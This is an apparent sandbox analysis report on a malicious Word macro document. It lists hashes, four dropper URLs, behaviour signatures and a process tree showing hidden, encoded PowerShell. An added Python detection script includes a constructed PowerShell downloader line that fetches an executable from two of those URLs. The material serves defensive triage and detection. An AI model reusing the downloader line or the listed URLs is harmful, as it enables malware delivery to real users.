Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/05/2024, 22:27

General

  • Target

    7e9f335b49f7d026508d63b75bdc0f1f_JaffaCakes118.doc

  • Size

    121KB

  • MD5

    7e9f335b49f7d026508d63b75bdc0f1f

  • SHA1

    e87dd29e12164407d76276be13b9c10449a7d8c3

  • SHA256

    f294e3bee01492d9c7b373ed1b38540d720a125341c891bb2f1a8856227cc304

  • SHA512

    a1fc109a59783fa80ec8c6aaa71e476f2a71ab8ba7ff7848ecb89f64a5060b425e62b85a3645bbbc0624776d920873c70afff2c46883449a17d934ddf4391360

  • SSDEEP

    1536:E1KwMGDHEX0zZUsN+agwBNyd+5sv/UHDdi1Nnpfe40rCU/2qfEYE+umL:OzDkXs6a80gcjdUU5JZEh

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://macrospazio.it/p4kEoI7/
    http://ondernemerstips.nl/mPs8pP/
    http://planitsolutions.co.nz/tLLiAh4/
    http://franssmanmedia.nl/kNBIm7/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    PowerShell was launched with its console window hidden (-WindowStyle hidden) and an encoded command (-e).

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e9f335b49f7d026508d63b75bdc0f1f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHeLL.exe
        PowersHeLL -WinDowsTyle hidden -e [base64-encoded command omitted]
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1412
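The signatures and process tree above describe the chain this report scores on: WINWORD.EXE spawning PowerShell with a hidden window and an encoded command that fetches from the dropper URLs. The Python below is an added example, not tria.ge's code and not the sample's own script, that runs that detection over a few constructed Sysmon-style process-creation records modelled on the tree (PIDs from the report; WINWORD's own parent PID is assumed), decodes a -EncodedCommand payload (base64 over UTF-16LE) and pulls URLs out of it. The encoded payload here is a stand-in built from a constructed downloader snippet that only references two of the report's URLs; the real encoded command is not reproduced. It goes slightly beyond the page's single case by pairing Excel and PowerPoint parents with other script hosts and by accepting the parameter-name prefixes PowerShell itself accepts (-w for -WindowStyle, -e/-enc for -EncodedCommand).

```python
import base64
import ntpath
import re

# Added example: detection and triage logic for the behaviour in this report
# (Office parent -> hidden PowerShell child with an encoded command), run
# over constructed Sysmon-style process-creation records. Not tria.ge code
# and not the sample's own script.

# Parents and script hosts to pair up. The report only shows Word ->
# PowerShell; the extra names generalise that (assumption, not from the page).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of -WindowStyle and -EncodedCommand
# and matches parameter names case-insensitively, so the report's
# "-WinDowsTyle hidden -e ..." is "-WindowStyle Hidden -EncodedCommand ...".
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:i[a-z]*)?\s+hidden\b", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>@)]+", re.I)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(script: str):
    """URLs referenced by a decoded script (stops at quotes and the '@' separator)."""
    return URL_RE.findall(script)


def analyze(events):
    """Flag script hosts spawned by Office and pull IOCs out of their command line."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        pname = ntpath.basename(parent["image"]).lower()
        cname = ntpath.basename(e["image"]).lower()
        if pname in OFFICE_PARENTS and cname in SCRIPT_CHILDREN:
            decoded = decode_encoded_command(e["cmdline"])
            findings.append({
                "pid": e["pid"],
                "parent": pname,
                "child": cname,
                "hidden_window": bool(HIDDEN_RE.search(e["cmdline"])),
                "decoded": decoded,
                "urls": extract_urls(decoded) if decoded else [],
            })
    return findings


# Constructed stand-in for a deobfuscated downloader: it only references two
# of the report's dropper URLs and is not the sample's real payload.
SAMPLE_SCRIPT = (
    "$u='http://macrospazio.it/p4kEoI7/@http://ondernemerstips.nl/mPs8pP/'.Split('@');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\123.exe');break}catch{}}"
)

# Constructed process-creation records modelled on the report's process tree
# (PIDs 1028/1332/1412 from the report; WINWORD's parent PID 600 is assumed).
SAMPLE_EVENTS = [
    {"pid": 1028, "ppid": 600,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n '
                r'"C:\Users\Admin\AppData\Local\Temp\7e9f335b49f7d026508d63b75bdc0f1f_JaffaCakes118.doc"'},
    {"pid": 1332, "ppid": 1028,
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": r"C:\Windows\splwow64.exe 12288"},
    {"pid": 1412, "ppid": 1028,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHeLL.exe",
     "cmdline": "PowersHeLL -WinDowsTyle hidden -e " + encode_ps(SAMPLE_SCRIPT)},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['parent']} -> {f['child']} (pid {f['pid']}), hidden={f['hidden_window']}")
        print("decoded:", f["decoded"])
        print("urls:", f["urls"])
```

splwow64.exe is also a child of WINWORD here but is not a script host, so it is not flagged; in a real pipeline the decoded script and its URLs would be handed to the config extractor that produced the "Malware Config" section above.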

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize: 20KB
    MD5: c09171f863fe693c95b68a15cfa2f725
    SHA1: e2d56d75f071e713fd0a142bd9d0d9388a7e4c00
    SHA256: b38abd585fcaa745d5c26eac8743d163b503ede8f5e69a9295b365d85acbd609
    SHA512: 9e5f0d575a9f6b5d415681b35bdf856ab7e226847d0b6e3672b8be66e0f5bb1f42123b5898719a358f063aca1779444ccaab615154cb747589abd1d44c5938b3

  Memory dumps from PID 1028 (dump name and size), in the order the report lists them:

  • memory/1028-19-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-23-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-6-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-11-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-27-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-103-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-235-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-234-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-72-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-59-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-45-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-40-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-29-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-26-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-25-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-24-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-0-0x000000002F791000-0x000000002F792000-memory.dmp (4KB)
  • memory/1028-22-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-2-0x00000000714FD000-0x0000000071508000-memory.dmp (44KB)
  • memory/1028-20-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-15-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-17-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-16-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-18-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-14-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-13-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-12-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-88-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-58-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-28-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-21-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-10-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-9-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-8-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-7-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-242-0x00000000006E0000-0x00000000007E0000-memory.dmp (1024KB)
  • memory/1028-243-0x00000000714FD000-0x0000000071508000-memory.dmp (44KB)
  • memory/1028-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
  • memory/1028-259-0x00000000714FD000-0x0000000071508000-memory.dmp (44KB)